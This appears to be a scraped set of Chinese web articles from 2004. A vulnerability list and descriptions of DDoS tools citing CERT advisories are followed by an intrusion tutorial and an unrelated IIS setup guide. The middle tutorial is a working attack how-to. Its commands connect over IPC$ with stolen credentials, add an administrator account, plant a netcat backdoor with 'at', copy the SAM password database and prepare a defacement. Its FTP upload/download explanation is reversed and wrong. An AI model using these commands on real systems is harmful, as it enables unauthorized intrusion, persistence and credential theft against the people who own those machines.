- SNMP Community Name的缺省设置
3. IIS (微软的Web服务器Microsoft Internet Information Server)
- RDS
- HTR
- 畸形header
- PWS文件访问
- CGI圈套
- PHP3元字符
- PHP mlog.html读文件
4. 数据库
- Oracle缺省账户/口令
- Oracle setuid root oratclsh
- SQL Server Xp_sprintf 缓存溢出
- SQL Server Xp_cmdshell 扩展
5. 电子商务主页应用
- NetscapeGetBo
- HttpIndexserverPath
- Frontpage Extensions
- FrontpagePwdAdministrators
6. 电子邮件系统
- Sendmail管道攻击
- SendmailMIMEbo
7. 文件共享
- NetBIOS
- NFS
8. RPC
- rpc.cmsd
- rpc-statd
- Sadmin
- Amd
- Mountd
9. BIND
- BIND nxt
- BIND qinv
10. Linux缓存溢出
- IMAP BO
- Qpopper BO
- 改写堆栈覆盖
- WU-FTP 缓存溢出
建议的修改步骤
在业务层次,通过组织来实施和管理安全部件,并且通过持续的保持警惕和对威胁的监控来降低新的风险。
ISS建议建立下面一些安全层次:
- 安全策略
- 安全管理层(比如内联网)
- 安全软件(基于主机的评估和入侵检测)
- 安全网络部件OS/net/db/web
漏洞描述
1. 拒绝服务攻击
漏洞名称:TFN
影响平台:Linux, Solaris, Unix
风险级别:高风险
攻击类别:基于网络,基于主机
Tribe Flood Network(TFN)是一个分布式拒绝服务攻击工具,黑客可以通过此工具利用多台主机同时攻击并淹没被攻击目标。它有4种不同的淹没方式 -- ICMP Echo flood, UDP Flood, SYN Flood和Smurf attack。TFN客户端和服务器端通过ICMP echo响应包来互相通信。
参考:
CERT建议CA-99-17: "Distributed Denial-of-Service Tools" at:http://www.cert.org/incident_notes/IN-99-07.html
漏洞名称:TFN2k
影响平台:Linux, Solaris, Unix
风险级别:高风险
攻击类别:基于网络、基于主机
Tribe Flood Network 2000 (TFN2k) 是一个分布式拒绝服务攻击工具,它可以实现多种淹没方式来攻击一台主机。它由客户端和服务端daemon组成,客户端可以控制一个或多个daemon,实际攻击由daemon执行。客户端可以通过UDP、TCP或者ICMP来和daemon通信,而且可以伪装流出数据包的IP地址。客户端和daemon的通信是加密的。
参考:
CERT建议CA-99-17: "Denial-of-Service Tools" at:http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
漏洞名称:Trin00
影响平台:Linux, Solaris, Unix
风险级别:高风险
攻击类别:Network Based, Host Based
Trin00是一个分布式拒绝服务攻击工具,攻击者可以控制多台主机来发送UDP风暴攻击其他主机。Trin00主控机可以向Trin00 daemon发出多种请求:
- 启动攻击一个主机的UDP风暴
- 停止一个攻击
- 改变UDP风暴的daemon配置
参考:
CERT建议CA-99-17: "Denial-of-Service Tools" at:http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
漏洞名称:Stacheldraht
影响平台:任何
风险级别:高风险
攻击类别:基于主机
Stacheldraht是一个分布式拒绝服务攻击工具,这个工具是基于Tribe Flood Network (TFN)和Trin00工具的源码。除了提供这两个工具的功能之外,Stacheldraht还将客户端、主控端、代理(僵尸)之间的通信加密,而且可以通过rpc命令远程更新代理系统。Stacheldraht的代理起初是构建并安装在Linux和Solaris系统中, 但是经过源码修改它可以安装在任何系统中。
参考:
CERT建议CA-2000-01: "Denial of Service Developments" at:http://www.cert.org/advisories/CA-2000-01.html
漏洞名称:FunTime Apocalypse
影响平台:Windows 9x, NT, 2000
风险级别:高风险
攻击类别:基于
Funtime Apocalypse是Windows9x和WindowsNT上的一个分布式拒绝服务攻击工具。攻击者可以发起一个“timer fused”风暴攻击一个目标计算机。Funtime Apocalypse包括一些文件:
- 一个风暴程序(bmb2.exe)
- 一个主程序(funtime.txt)
- 一些批处理文件(funtime.bat, timer98.bat, 和timerNT.bat)
- 两个Windows HTML应用文件(funtime98.hta and funtimeNT.hta) -
2004-02-20
一般入侵所需要的几个常用命令 - [网络天地]
一般入侵所需要的几个常用命令 一般入侵所需要的几个常用命令
如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。
1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
net命令果然强大啊!
2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.
在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321
ftp www.51.net
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要复制到D盘下把C改为D,就行了!
copy index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他复制到WINNT目录里
就要把输入
copy index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy \\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6:set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroo -
2004-02-20
在Win 2003环境中设置一个Web服务器 - [网络天地]
概要
本文介绍了如何在 Windows Server 2003 环境中设置一个用于匿名访问的WWW服务器。
安装 Internet 信息服务
Microsoft Internet 信息服务 (IIS) 是与Windows Server 2003 集成的 Web 服务。
要安装IIS、添加可选组件或删除可选组件,请按以下步骤xx作:
单击开始,指向控制面板,然后单击“添加或删除程序”。
“添加或删除程序”工具就会启动。
单击添加/删除 Windows 组件。
显示“Windows 组件向导”。
在Windows 组件列表中,单击Web 应用程序服务器。
单击详细信息,然后单击Internet 信息服务 (IIS)。
单击详细信息,以查看 IIS 可选组件列表。
选择您要安装的可选组件。默认情况下,下列组件是选中的:
公用文件
FrontPage 2002 Server Extentions
Internet 信息服务管理单元
Internet 信息服务管理器
NNTP 服务
SMTP 服务
World Wide Web 服务
单击“World Wide Web 服务”,然后单击详细信息 ,以查看 IIS 可选子组件(如Active Server Pages 组件和“远程管理 (HTML) 工具”)的列表。选择您要安装的可选子组件。默认情况下,下列组件是选中的:
World Wide Web 服务
单击确定,直到返回“Windows 组件向导”。
单击下一步,然后完成“Windows 组件向导”。
配置匿名身份验证
要配置匿名身份验证,请按以下步骤xx作:
单击开始,指向管理工具,然后单击Internet 信息服务 (IIS)。
展开“* 服务器名称”(其中服务器名称 为该服务器的名称),右键单击Web 站点,然后单击属性。
在Web 站点属性 对话框中,单击目录安全性 选项卡。
在“身份验证和访问控制”下,单击编辑。
单击“启用匿名访问”复选框,将其选中。
备注:“用户名”框中的用户帐户只用于通过 Windows guest 帐户进行匿名访问。
默认情况下,服务器会创建并使用帐户IUSR_computername。匿名用户帐户密码仅在Windows 中使用;匿名用户不使用用户名和密码登录。
在“已验证身份的访问”下,单击“集成的 Windows 身份验证”复选框,将其选中。
单击确定两次。
基本 Web 站点配置
单击开始,指向管理工具,然后单击Internet 信息服务 (IIS)。
展开“服务器名称”(其中服务器名称 为该服务器的名称),然后展开Web 站点。
右键单击默认Web 站点,然后单击属性。
单击Web 站点选项卡。如果您已为计算机分配了多个 IP 地址,则请在IP 地址 框中单击您要指定给此 Web 站点的 IP 地址。
单击性能选项卡。使用Web 站点属性- 性能对话框可设置影响内存、带宽使用和Web 连接数量的属性。
通过配置某个特定站点上的网络带宽,您可以更好地控制该站点的通信量。例如,通过在低优先级的 Web 站点上限制带宽,您可以放宽对他站点的访问量的限制。同样,当您指定到某个 Web 站点的连接数量时,您就可以为其他站点释放资源。设置是站点专用的,应根据网络通信量和使用变化情况进行调整。
单击“限制可用于此 Web 站点的带宽”复选框,将其选中,可配置 IIS 将网络带宽调节到选定的最大带宽量,以千字节每秒 (KB/S) 为单位。
单击Web 服务连接复选框,将其选中,可选择特定数目或者不限定数目的 Web 服务连接。限制连接可使计算机资源能够用于其他进程。
备注:每个浏览 Web 站点的客户机通常都使用大约三个连接。
单击主目录选项卡。
如果您想使用存储在本地计算机上的 Web 内容,则单击“此计算机上的目录”然后在本地路径 框中键入您想要的路径。例如,默认路径为 C:\Inetpub\wwwroot。
备注:为了增加安全性,请不要在根目录下创建 Web 内容文件夹。
如果要使用存储在另一台计算机上的 Web 内容,则单击“另一计算机上的共享位置”,然后在显示的网络目录框中键入所需位置。
如果您要使用存储在另一个 Web 地址的 Web 内容,则单击“重定向到 URL”,然后在“重定向到”框中键入所需位置。在“客户会送到”下,单击相应的复选框,将其选中。